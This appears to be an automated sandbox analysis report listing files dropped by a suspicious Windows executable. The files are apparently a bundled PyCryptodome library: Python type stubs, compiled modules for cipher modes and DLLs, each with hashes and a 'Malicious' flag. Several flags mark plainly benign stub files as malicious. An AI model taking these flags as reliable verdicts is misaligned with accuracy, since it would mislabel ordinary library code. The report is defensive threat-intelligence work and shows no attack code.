                                                                                                                                            SSDEEP:24:1RM7ClDOT3zRA9UCLnRNne3yFnR3Fne3UPtWLn8no0E+XW3oIQ:cSuVXQvesLeJLn8nlEF49
                                                                                                                                            MD5:7D3D576FC1628D95451DC9436EC64091
                                                                                                                                            SHA1:742B2C357FF613BC5D5285211D3D52AA4BD6F445
                                                                                                                                            SHA-256:49B6A847D2C71DA556387D1987946EDD0C259CCF3952C63C9D1061CB4EB731FE
                                                                                                                                            SHA-512:8781937E2570F5FE246F0349A41CC3406E40156F9FDEC08701983DB091DA06637B6CD428D109A57F40B61F3D72DA825F69ABA1BC0F1DFA3D9660A21E88DFFA74
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Tuple, Dict, overload, Optional....__all__ = ['GcmMode']....Buffer = Union[bytes, bytearray, memoryview]....class GcmMode(object):.. block_size: int.. nonce: Buffer.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> GcmMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None:
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):21493
                                                                                                                                            Entropy (8bit):5.34105960437538
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:JCqHG+qi2jGRJF44h3R422oD9eWWEne47l8vadgETqZr0Tx19j57:JCsG+qJujhBYZQqa9qhmD9j57
                                                                                                                                            MD5:4490D4E12D59A2C6B4E1B9B7297785FF
                                                                                                                                            SHA1:F40E84B92F52F2D9A3FE5A4056C90858425A68F5
                                                                                                                                            SHA-256:6E015F79A31EC051AA54C2C5DADDD696E058A6E59804DB6B3831F5B2E293C49B
                                                                                                                                            SHA-512:F72DB4940DF0933AC95588EDF4E028A41D19647E0C343C9FE0BCD04CB3495F3B61D82D7550CC2784B6076A67B843FB73435FA32E164352D37085F0BD8E172BEB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.P..............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).ap....Offset Codebook (OCB) mode...OCB is Authenticated Encryption with Associated Data (AEAD) cipher mode.designed by Prof. Phillip Rogaway and specified in `RFC7253`_...The algorithm provides both authenticity and privacy, it is very efficient,.it uses only one key and it can be used in online mode (so that encryption.or decryption can start before the end of the message is available)...This module implements the third and last variant of OCB (OCB3) and it only.works in combination with a 128-bit block symmetric cipher, like AES...OCB is patented in US but `free licenses`_ exist for software implementations.meant for non-military purposes...Example:. >>> from Cryptodome.Cipher import AES. >>> from Cryptodome.Random import get_random_bytes
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1267
                                                                                                                                            Entropy (8bit):4.510576229003074
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7CRDQlT30xA949nRNne3yFnR3Fne3UPtWYn90E+5Q:ccQlARNvesLeJYnaEv
                                                                                                                                            MD5:76916331AA1417BD4EADDD10948D8D26
                                                                                                                                            SHA1:1223CEC2D805BE11A585A842EDA6B0214F1AB3E3
                                                                                                                                            SHA-256:E0C136E3762DD93C24793DAF989D94061AF30A300D7308BC8AD2EF69E73A92E5
                                                                                                                                            SHA-512:BABD83C1F0D4399B0B2FB099B8303303694763104B75C56C64CAD8C0A722B7F3FEE5FA0EA11026857E5822853D73905B45AA83EF4DAC23D8DD56A6EF41C73621
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Any, Optional, Tuple, Dict, overload....Buffer = Union[bytes, bytearray, memoryview]....class OcbMode(object):.. block_size: int.. nonce: Buffer.... def __init__(self,.. factory: ModuleType,.. nonce: Buffer,.. mac_len: int,.. cipher_params: Dict) -> None: ..... .. def update(self, assoc_data: Buffer) -> OcbMode: ....... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None:
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10331
                                                                                                                                            Entropy (8bit):5.2681367362904385
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:loy5NPuxI4HU4JWVU4w8GZZkZZZZAjm7TbAAAFJ:N34HTJWVTwTja2
                                                                                                                                            MD5:DE923D284AF36F334D73536CDF0EB983
                                                                                                                                            SHA1:F8572DD1885D96255656E437022827EB0F31F265
                                                                                                                                            SHA-256:629730B1A7E4836CD0151623D107653FA403214A563F144836B5103FF9C9B4A6
                                                                                                                                            SHA-512:EC4B16E97D490DEF18567EA7549A7AE706A2058A2DB264AEA17F8F4BD29EC0C8E417BB1BC008FCAE028EAD8753F7C3DBBBE61F084271B4EE8164BBEFF2C80B55
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.).............................d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.....e.d.d...............Z...G.d...d.e...............Z.d...Z.d.S.).z..Output Feedback (CFB) mode....OfbMode.....)..._copy_bytes)...load_pycryptodome_raw_lib..VoidPointer..create_string_buffer..get_raw_buffer..SmartPointer..c_size_t..c_uint8_ptr..is_writeable_buffer)...get_random_bytesz.Cryptodome.Cipher._raw_ofba..... int OFB_start_operation(void *cipher,. const uint8_t iv[],. size_t iv_len,. void **pResult);. int OFB_encrypt(void *ofbState,. const uint8_t *in,. uint8_t *out,. size_t data_len);. int OFB_decrypt(void *ofbState,.
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):720
                                                                                                                                            Entropy (8bit):4.737448172448685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBw1k1Jal9lvIY3FDXHo2JRyU1AOlSFq6R5pFq6jI33ynFq6R5xnFq6jI338:1REPZjT3pHo2NAY4nRNne3yFnR3Fne38
                                                                                                                                            MD5:8E7443C03B74A4BB74BBBCF7A93282A7
                                                                                                                                            SHA1:7A9C908B9D698278E5561A45A024C8DDF53CF304
                                                                                                                                            SHA-256:D1B1A685ABE48604348DA3AE3C54BAF54ED0BD5CC9F0CB93867A82F8877F9ECF
                                                                                                                                            SHA-512:F9580522EE9EE5F223E8D43F8E61D5CE054D9E1B4F361AD2B6C9DE9CAFCF95BECF8DF21D0B5CDECF59CEA2808F01D0952CD34A4F54B354F506CCA6D971E1F6C5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, overload....from Cryptodome.Util._raw_api import SmartPointer....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OfbMode']....class OfbMode(object):.. block_size: int.. iv: Buffer.. IV: Buffer.. .. def __init__(self,.. block_cipher: SmartPointer,.. iv: Buffer) -> None: ..... @overload.. def encrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def encrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: ..... @overload.. def decrypt(self, plaintext: Buffer) -> bytes: ..... @overload.. def decrypt(self, plaintext: Buffer, output: Union[bytearray, memoryview]) -> None: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6378
                                                                                                                                            Entropy (8bit):5.441750266001705
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:E8N+Z1+r1IGXC9aFst834mGPUAt834wmp60nxBXGskDrvv:f+qZR0FU44OU4RpRxEn
                                                                                                                                            MD5:9D71573B53586177431DB96B9FF56362
                                                                                                                                            SHA1:B103C53FCC82F90A73D8DF586BE4EBF9A16FE46E
                                                                                                                                            SHA-256:5FD3BDDFB8082E4F2BE8E997805FDE42C49CDEE40D0E70374E8FD31366E846E0
                                                                                                                                            SHA-512:480F315D7F76A60FDB7B40DF97A689A91BFF6A32F1B4783D49D729A4900F402F3C6220EFE4147206162D33D51076EBFB0FA3697E521CC95DE3E4ED9805B5FA59
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........ec.........................J.....d.Z.d.g.Z.d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z..OpenPGP mode....OpenPgpMode.....)..._copy_bytes)...get_random_bytesc.....................$.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d.S.).r....az...OpenPGP mode... This mode is a variant of CFB, and it is only used in PGP and. OpenPGP_ applications. If in doubt, use another mode... An Initialization Vector (*IV*) is required... Unlike CFB, the *encrypted* IV (not the IV itself) is. transmitted to the receiver... The IV is a random data block. For legacy reasons, two of its bytes are. duplicated to act as a checksum for the correctness of the key, which is now. known to be insecure and is ignored. The encrypted IV is therefore 2 bytes. longer than the clean IV... .. _OpenPGP: http://tools.ietf.org/html/rfc4880.. :undocumented: __init__. c.....................d.....|.j.........|._.........d.|._...........|.j.........|.|.j.........f.d.|.j...
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):576
                                                                                                                                            Entropy (8bit):4.621504702467695
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1Ro8s7REYB6IvIY3FDUCpu8RypqIY3fmIY3fm1Ap/ILFq6R5wnFq6R5j:1RM7C8T3SCpTB3632A9KnReFnRN
                                                                                                                                            MD5:C1EADE4DE0796F8C003DBB655E410274
                                                                                                                                            SHA1:283080AEFA8D7F00772CE108277688D55519EF46
                                                                                                                                            SHA-256:5E1521B1EA98D146374597A94FF5DF82FBE49F7C3DC06F6DB03379E1EA79D7E5
                                                                                                                                            SHA-512:3D2601FFBB3EC84FDEF28FBF4F409CBBF60D220B394D256FD13728EF5F0CC587FC2EDB00C868C10EEF7E0303508949D79DC23F3998E5CE2D4942A2A625BFC676
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Dict....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['OpenPgpMode']....class OpenPgpMode(object):.. block_size: int.. iv: Union[bytes, bytearray, memoryview].. IV: Union[bytes, bytearray, memoryview].. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. iv: Buffer,.. cipher_params: Dict) -> None: ..... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: .......
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15323
                                                                                                                                            Entropy (8bit):5.401837017215877
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:5q41BKw/NqrE9fLihays57hMav+zGn1E3:5P/gryfLihu57c53
                                                                                                                                            MD5:F04AA53B64EF93A7989F8D78C6BB93C7
                                                                                                                                            SHA1:A4D5EF85B7D79A591721E9A603F0034E489AFC4C
                                                                                                                                            SHA-256:08A7F042F0505B86D439096DCCA010C6C379FE421DB1EF35F3C31EA87C5661DA
                                                                                                                                            SHA-512:3C41C484EAF45BEFA99BC89A54DFC84C7DA149B1E0E93AA83453FA92809DE58596FA21F042082A19966B3A931C12548A1F47AAA4411AB904963A13CA8FB55A85
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eA8.............................d.Z.d.g.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.d...Z.d.S.).z-.Synthetic Initialization Vector (SIV) mode....SivMode.....)...hexlify..unhexlify)...bord.._copy_bytes)...is_buffer)...long_to_bytes..bytes_to_long)..._S2V)...BLAKE2s)...get_random_bytesc.....................X.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.d...Z.d.d...Z.d.S.).r....a....Synthetic Initialization Vector (SIV)... This is an Authenticated Encryption with Associated Data (`AEAD`_) mode.. It provides both confidentiality and authenticity... The header of the message may be left in the clear, if needed, and it will. still be subject to authentication. The decryption step tells the receiver. if the message comes from a source that really knowns the secret key.. Additionally, decryption detects if any part of the message - including the. header
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1299
                                                                                                                                            Entropy (8bit):4.379657025743841
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RM7ClDTglT3RzEA9unReFnR7PtWLn8no0E+XW3oIQ:cSklORuWLn8nlEF49
                                                                                                                                            MD5:FB584A8E53BC1B138B3932BDF16901D5
                                                                                                                                            SHA1:CF4F2426C15F17BD613A304B3E7F19A181E2035E
                                                                                                                                            SHA-256:80DAE2A187B04F2E3729BCDF78DE0DB31E22CA0922AD420F65077C448F1538E5
                                                                                                                                            SHA-512:05D214D0B39CA5566EA833772207D823AF350AEDDAF4A76C9569024D2A374D48FC48A0729B226A1A934E7CA179A5130ABB4232D3412BA27C9DA3DB214A9358BA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Union, Tuple, Dict, Optional, overload....Buffer = Union[bytes, bytearray, memoryview]....__all__ = ['SivMode']....class SivMode(object):.. block_size: int.. nonce: bytes.. .. def __init__(self,.. factory: ModuleType,.. key: Buffer,.. nonce: Buffer,.. kwargs: Dict) -> None: ..... .. def update(self, component: Buffer) -> SivMode: ....... def encrypt(self, plaintext: Buffer) -> bytes: ..... def decrypt(self, plaintext: Buffer) -> bytes: ....... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def verify(self, received_mac_tag: Buffer) -> None: ..... def hexverify(self, hex_mac_tag: str) -> None: ....... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer) -> Tuple[bytes, bytes]: ..... @overload.. def encrypt_and_digest(self,.. plaintext: Buffer,..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):5.236611028290556
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:osiHXqpoUol3xZhRyQX5lDnRDFFav+tcqgRvE:K6D+XBDfDgRvE
                                                                                                                                            MD5:7FA5B1642D52FABFE1D3EBD1080056D4
                                                                                                                                            SHA1:56B9E87D613EE9A8B6B71A93ED5FA1603886139A
                                                                                                                                            SHA-256:88C7EC96B9E1D168005B3A8727AAA7F76B4B2985083ED7A9FB0A2AB02446E963
                                                                                                                                            SHA-512:9E0BF47060A2B7AC8FFD2CB8B845D44013C068BFE74926A67496D79BCB513506625BDA1DDF18ECE7777D1379F036506F19457D0A43FA618A8F75664C47798E64
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):36352
                                                                                                                                            Entropy (8bit):6.558039926510444
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Dz5P+7nYpPMedFDlDchrVX1mEVmT9ZgkoD/PKDkGuF0U390QOo8VdbKBWmuTLg46:DzdqWB7YJlmLJ3oD/S4j990th9VTsC
                                                                                                                                            MD5:E63FC8375E1D8C47FBB84733F38A9552
                                                                                                                                            SHA1:995C32515AA183DA58F970CEDC6667FAE166615A
                                                                                                                                            SHA-256:F47F9C559A9C642DA443896B5CD24DE74FED713BDF6A9CD0D20F5217E4124540
                                                                                                                                            SHA-512:4213189F619E7AA71934033CABA401FE93801B334BA8D8EAFEDA89F19B13224C516E4BB4F4F93F6AE2C21CD8F5586D3FFAC3D16CB1242183B9302A1F408F6F6A
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15872
                                                                                                                                            Entropy (8bit):5.285246086368036
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:jJBjJHEkEPYi3Xd+dc26E4++yuqAyXW9wifD4mqccqgwYUMvEW:ZkRwi3wO26Ef+yuIm9PfDewgwYUMvE
                                                                                                                                            MD5:A914F3D22DA22F099CB0FBFBBB75DDBF
                                                                                                                                            SHA1:2834AEB657CA301D722D6D4D1672239C83BE97E3
                                                                                                                                            SHA-256:4B4DBF841EC939EF9CC4B4F1B1BA436941A3F2AF2F4E34F82C568DFC09BA0358
                                                                                                                                            SHA-512:15BF5FCE53FB2C524054D02C2E48E3DDC4EAC0C1F73325D58B04DFE17259C208FFAC0A7C634FBC2CF1A08E7F28C1FD456061BA0838F4316EB37514E1E8D4C95F
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):5.505232918566824
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:9d9VkyQ5f8vjVaCHpKpTTjaNe7oca2DWZQ2dhmdcqgwNeecBih:rkP5cjIGpKlqD2DakzgwNeE
                                                                                                                                            MD5:9F1A2A9D731E7755EE93C82C91FA5FE2
                                                                                                                                            SHA1:41085FBE84E1B98A795871033034FA1F186274EF
                                                                                                                                            SHA-256:17F3EAF463868B015583BD611BE5251E36AAB616522FF4072011B3D72F6F552F
                                                                                                                                            SHA-512:7E29D4729837D87AEF34CFA7B1F86DFBB81907CD11FC575C4ED1B8A956409492315BFA76ADE4D7C51E51E37E5D098A7F4FEE4C58D86D0E6245A4AA0D392D488A
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):20992
                                                                                                                                            Entropy (8bit):6.061115794354147
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:pUv5cJMOZA0nmwBD+XpJgLa0Mp8QHg4P2llyM:GK1XBD+DgLa1gTi
                                                                                                                                            MD5:883DE82B3B17F95735F579E78A19D509
                                                                                                                                            SHA1:3EC7259ACA3730B2A6F4E1CA5121DB4AB41C619E
                                                                                                                                            SHA-256:67FF6C8BBDC9E33B027D53A26DF39BA2A2AD630ACCE1BAC0B0583CA31ADF914F
                                                                                                                                            SHA-512:602915EAA0933F5D1A26ECC1C32A8367D329B12794CBF2E435B1704E548858E64710AB52BC6FC14FC98DF0B8EEBDE2B32A35BCF935079CC8E2412C07DF5303FD
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):25088
                                                                                                                                            Entropy (8bit):6.475398255636883
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:Zc6HLZiMDFuGu+XHZXmrfXA+UA10ol31tuXy7IYgLWi:q6H1TZXX5XmrXA+NNxWi0dLWi
                                                                                                                                            MD5:0AC22DA9F0B2F84DE9D2B50D457020C1
                                                                                                                                            SHA1:682E316AE958121D0E704CAB0F78CCAD42C77573
                                                                                                                                            SHA-256:480C79C713AD15328E9EB9F064B90BCDCB5AAD149236679F97B61218F6D2D200
                                                                                                                                            SHA-512:11C04D55C5E73583D658E0918BD5A37C7585837A6E0F3C78AEF10A5D7A5C848B0620028177A9D9B0AD5DB882B2A26624F92BEFC9BC8F8A23C002723E50DD80A5
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):4.839420412830416
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:CF/1nb2mhQtkr+juOxKbDbRHcqgYvEkrK:42f6iuOsbDXgYvEmK
                                                                                                                                            MD5:6840F030DF557B08363C3E96F5DF3387
                                                                                                                                            SHA1:793A8BA0A7BDB5B7E510FC9A9DDE62B795F369AE
                                                                                                                                            SHA-256:B7160ED222D56925E5B2E247F0070D5D997701E8E239EC7F80BCE21D14FA5816
                                                                                                                                            SHA-512:EDF5A4D5A3BFB82CC140CE6CE6E9DF3C8ED495603DCF9C0D754F92F265F2DCE6A83F244E0087309B42930D040BF55E66F34504DC1C482A274AD8262AA37D1467
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):4.905258571193623
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:fRgPX8lvI+KnwSDTPUDEnKWPXcqgzQkvEd:4og9rUD/mpgzQkvE
                                                                                                                                            MD5:7256877DD2B76D8C6D6910808222ACD8
                                                                                                                                            SHA1:C6468DB06C4243CE398BEB83422858B3FED76E99
                                                                                                                                            SHA-256:DBF703293CFF0446DFD15BBAEDA52FB044F56A353DDA3BECA9AADD8A959C5798
                                                                                                                                            SHA-512:A14D460D96845984F052A8509E8FC44439B616EEAE46486DF20F21CCAA8CFB1E55F1E4FA2F11A7B6AB0A481DE62636CEF19EB5BEF2591FE83D415D67EB605B8E
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14848
                                                                                                                                            Entropy (8bit):5.300728193650235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:jGYJ1gSHxKkwv0i8XSi3Sm57NEEE/qexUEtDr6krRcqgUF6+6vEX:jR01si8XSi3SACqe7tDlDgUUjvE
                                                                                                                                            MD5:B063D73E5AA501060C303CAFBC72DAD3
                                                                                                                                            SHA1:8C1CA04A8ED34252EB233C993DDBA17803E0B81E
                                                                                                                                            SHA-256:98BACA99834DE65FC29EFA930CD9DBA8DA233B4CFDFC4AB792E1871649B2FE5C
                                                                                                                                            SHA-512:8C9AD249F624BDF52A3C789C32532A51D3CC355646BD725553A738C4491EA483857032FB20C71FD3698D7F68294E3C35816421DFF263D284019A9A4774C3AF05
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):57856
                                                                                                                                            Entropy (8bit):4.260136375669177
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:9RUqVT1dZ/GHkJnYcZiGKdZHDLtiduprZvZY0JAIg+v:9rHGHfJidIK
                                                                                                                                            MD5:3AEA5302F7F03EDEFF49D1C119C61693
                                                                                                                                            SHA1:DBDDE1C10B253744153FC1F47C078AAACCF3F3A6
                                                                                                                                            SHA-256:E5DDA67D4DF47B7F00FF17BE6541CA80BDB4B60E1F6FD1A7D7F115DDF7683EE5
                                                                                                                                            SHA-512:DD42C24EDAF7E1B25A51BC8C96447496B3289C612C395CA7BD8BF60A162229C2E0CA0432CDDF1CB2D65D80189DB02BEE42FFD0E7DD9E5FC19278CA3FD593AB2C
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):58368
                                                                                                                                            Entropy (8bit):4.276947153784193
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:98Uqho9weF5/eHkRnYcZiGKdZHDL7idErZ8ZYXGg:9gCneH//idv2
                                                                                                                                            MD5:BA5BA714AEBFD8130EB6E0983FBAE20B
                                                                                                                                            SHA1:3309C26A9083EC3AD982DD3D6630FCC16465F251
                                                                                                                                            SHA-256:861167DFEB390261E538D635EAD213E81C1166D8D85A496774FBF2EBFF5A4332
                                                                                                                                            SHA-512:309CC3FD8DB62517AE70B404C5ACD01052F10582A17123135CD1A28D3A74AB28F90A8E7ED7D2061A4B6C082F85E98DA822D43986FC99367B288A72BA9F8B5569
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):10752
                                                                                                                                            Entropy (8bit):4.579354442149926
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:j0qVVdJvbrqTu6ZdpvY0IluLfcC75JiCKs89EpmFWLOXDwoYPj15XkcX6gbW6z:pVddiT7pgTctEEI4qXDe11kcqgbW6
                                                                                                                                            MD5:1C74E15EC55BD8767968024D76705EFC
                                                                                                                                            SHA1:C590D1384D2207B3AF01A46A5B4F7A2AE6BCAD93
                                                                                                                                            SHA-256:0E3EC56A1F3C86BE1CAA503E5B89567AA91FD3D6DA5AD4E4DE4098F21270D86B
                                                                                                                                            SHA-512:E96CA56490FCE7E169CC0AB803975BAA8B5ACB8BBAB5047755AE2EEAE177CD4B852C0620CD77BCFBC81AD18BB749DEC65D243D1925288B628F155E8FACDC3540
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22016
                                                                                                                                            Entropy (8bit):6.143744403797058
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:7Uv5cRUtPQtjLJiKMjNrDF6pJgLa0Mp8Qy0gYP2lXCM:UKR8I+K0lDFQgLa1WzU
                                                                                                                                            MD5:E7826C066423284539BD1F1E99BA0CC6
                                                                                                                                            SHA1:DA7372EEB180C2E9A6662514A8FA6261E04AC6DC
                                                                                                                                            SHA-256:0E18B7C2686BB954A8EE310DD5FDB76D00AC078A12D883028BFFC336E8606DA2
                                                                                                                                            SHA-512:55F8B00B54F3C3E80803D5A3611D5301E29A2C6AF6E2CAA36249AEBA1D4FCC5A068875B34D65106C137F0455F11B20226B48EEF687F5EA73DFEA3C852BF07050
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):17920
                                                                                                                                            Entropy (8bit):5.353670931504009
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:tPHNP3Mj7Be/yB/6sB3yxcb+IMcOYqQViCBD8Ng6Vf4A:DPcnB8KSsB34cb+bcOYpMCBDB
                                                                                                                                            MD5:D5DB7192A65D096433F5F3608E5AD922
                                                                                                                                            SHA1:22AD6B635226C8F6B94F85E4FBFB6F8C18B613C8
                                                                                                                                            SHA-256:FAB286E26160820167D427A4AAB14BE4C23883C543E2B0C353F931C89CEA3638
                                                                                                                                            SHA-512:5503E83D68D144A6D182DCC5E8401DD81C1C98B04B5ED24223C77D94B0D4F2DD1DD05AED94B9D619D30D2FE73DFFA6E710664FFC71B8FA53E735F968B718B1D9
